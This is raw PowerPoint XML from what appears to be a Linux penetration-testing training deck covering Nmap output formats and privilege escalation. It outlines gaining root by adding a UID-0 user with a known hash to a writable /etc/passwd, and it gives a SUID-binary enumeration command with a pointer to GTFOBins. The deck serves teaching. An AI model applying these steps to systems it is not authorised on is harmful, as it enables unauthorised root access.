              <a:t>– XML, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>nmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>gnmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> formats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oG</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>– grep-able </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>nmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>gnmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a: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oX</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>– XML</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oN</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>– Nmap (i.e., </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>stdout</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>For XML, apply a stylesheet</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>--stylesheet /path/to/sheet</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>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webxml</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>: uses nmap.org</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Rectangle 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{46008F31-5B40-4A64-A22D-6163BCD555A1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8237109" y="1180109"/>
            <a:ext cx="479508" cy="2518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07803DA-671B-4A61-B4C0-F225E8A3AD63}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5058122" y="1412111"/>
            <a:ext cx="398462" cy="2518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54D33A7-4DCA-4C5B-9991-0A4958DE18B5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2277598" y="1630254"/>
            <a:ext cx="1012254" cy="2518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454D9C-31FB-4E3F-8763-8F8EC723024E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6887904" y="2201729"/>
            <a:ext cx="4890514" cy="4199070"/>
            <a:chOff x="6887904" y="2201729"/>
            <a:chExt cx="4890514" cy="4199070"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="14" name="Picture 13">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C406D7E0-7B0C-4A50-96DA-EB34EFE5B7C3}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill rotWithShape="1">
            <a:blip r:embed="rId3"/>
            <a:srcRect t="36934" r="42415"/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="6887904" y="2201729"/>
              <a:ext cx="4890514" cy="3879476"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="38100">
              <a:solidFill>
                <a:schemeClr val="bg2"/>
              </a:solidFill>
            </a:ln>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="15" name="TextBox 14">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{695AE12B-CB05-402C-AB1F-347C3C962E99}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8090962" y="6031467"/>
              <a:ext cx="2484398" cy="369332"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="381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Nmap XML in Browser</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="34162836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3D372-415B-4325-B4E3-75C87D509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6FE292D-86FA-4A42-912F-7D4E42473B40}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>What Do I Have in My Pocket? (Continued)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Text Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4C99B8E9-15F6-4A66-8C52-3ACC650654E4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="414338" y="1295400"/>
            <a:ext cx="11363325" cy="513080"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Writable System Files: /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/passwd example</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9FB96450-3268-4C2B-B285-D5AC56685FE8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2"/>
          <a:srcRect b="43356"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="870808" y="1939117"/>
            <a:ext cx="10450383" cy="1214120"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="38100">
            <a:solidFill>
              <a:schemeClr val="tx2"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Picture 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E27CAB81-86A2-4996-8DED-94F0BE7EEC2A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="589781" y="3398520"/>
            <a:ext cx="11012437" cy="1009791"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="38100">
            <a:solidFill>
              <a:schemeClr val="tx2"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Picture 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B194E3C2-47CB-4AD0-88F1-88FFBC376E95}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3804917" y="4655777"/>
            <a:ext cx="4582164" cy="1619476"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="38100">
            <a:solidFill>
              <a:schemeClr val="tx2"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="TextBox 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{34C01A73-FDB1-4082-95EF-93874080B5BE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3764152" y="2665082"/>
            <a:ext cx="73915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anose="020B0604020202020204"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>passwd used to hold hashes before shadow, still can</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="TextBox 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BF2B51A2-8648-4309-A019-216781BD94CA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5948552" y="3461819"/>
            <a:ext cx="56536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anose="020B0604020202020204"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Add a </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="2000" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" err="1">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>pwd</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="2000" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> hash and new user with id 0 (root)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="TextBox 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{12302CD9-664A-45B0-A3FE-CAB16C2A56C1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8478019" y="4953404"/>
            <a:ext cx="312419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Arial" panose="020B0604020202020204"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>su</a:t>
            </a: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 to the new user with known password, now effectively root</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="TextBox 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{26AA678D-15CE-4F26-8F68-97052A47BB85}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3659004" y="4126011"/>
            <a:ext cx="64607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User</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="TextBox 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{465AA0F8-A3AA-4788-9A8C-87413BCB478A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5948552" y="4128445"/>
            <a:ext cx="7718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Hash</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="TextBox 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7DA9E7B8-BB2D-4ECF-AF53-A5DA912373EE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7643673" y="4116346"/>
            <a:ext cx="9548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UID/GID</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="16" name="Straight Connector 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5965636F-80C1-4481-9197-C43CFB7450B8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="8254101" y="4096441"/>
            <a:ext cx="265959" cy="1064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119A41-5B43-45FF-98D0-041790BBE860}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8865919" y="4133373"/>
            <a:ext cx="7718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Notes</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="TextBox 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1E961069-BE9A-411E-A9F0-8F4784079ABF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9692729" y="4144833"/>
            <a:ext cx="7718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Home</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="TextBox 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9225619A-557E-4AE9-AFBB-C237A12139DD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10647473" y="4133373"/>
            <a:ext cx="7718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mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Shell</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="41398665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3D372-415B-4325-B4E3-75C87D509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6FE292D-86FA-4A42-912F-7D4E42473B40}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>What Do I Have in My Pocket? (Continued)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Text Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4C99B8E9-15F6-4A66-8C52-3ACC650654E4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="414338" y="1295399"/>
            <a:ext cx="11363325" cy="1083657"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>SUID Binaries: Run as the owner (many times – root)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Manual command: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>find / -perm /4000 2&gt;/dev/null</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="13" name="Picture 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C45F7E14-60E9-495F-AED9-96625C80791E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2"/>
          <a:srcRect r="51333" b="79963"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="440734" y="2348984"/>
            <a:ext cx="5933440" cy="1083657"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="38100">
            <a:solidFill>
              <a:schemeClr val="tx2"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="15" name="Picture 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1404766B-FF44-4563-B8EF-209D35654067}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="858324" y="3651701"/>
            <a:ext cx="7725853" cy="657317"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="38100">
            <a:solidFill>
              <a:schemeClr val="tx2"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="16" name="Picture 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AA845C19-6BA1-4B65-B7E8-B43E1EF598BE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1785336" y="4528078"/>
            <a:ext cx="8621328" cy="1428949"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="38100">
            <a:solidFill>
              <a:schemeClr val="tx2"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="Rectangle 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D71A8C69-E490-4BD7-9F48-D23C952FC9F6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1180736" y="3815211"/>
            <a:ext cx="194718" cy="356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8153394F-4E10-40C0-B9D7-6A77746EF529}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2338976" y="3789566"/>
            <a:ext cx="519838" cy="356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0474CC76-6D8E-4157-BDCC-1B02A48783A6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5681616" y="4886462"/>
            <a:ext cx="1460864" cy="437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E6EE8C7-6FB7-4FF5-B581-74185754A262}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="404252" y="2976880"/>
            <a:ext cx="2359268" cy="257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06182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2252E-8D8C-4788-959D-A425B98E8E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854238B-403F-45ED-8806-96C2457168DF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>SUID Binaries – A Note</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Text Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3BC02649-B4BD-40B2-BF7D-F673BD38DF6B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="414338" y="1295399"/>
            <a:ext cx="11363325" cy="1529701"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>SUID binaries are naturally in Linux</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Example: passwd requires SUID to function, not often exploitable</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Early on, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>GTFOBins</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> everything until you’re familiar</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{72B630FE-FEE8-4E1E-868F-1FEADFDF494A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2"/>
          <a:srcRect r="52333" b="50565"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
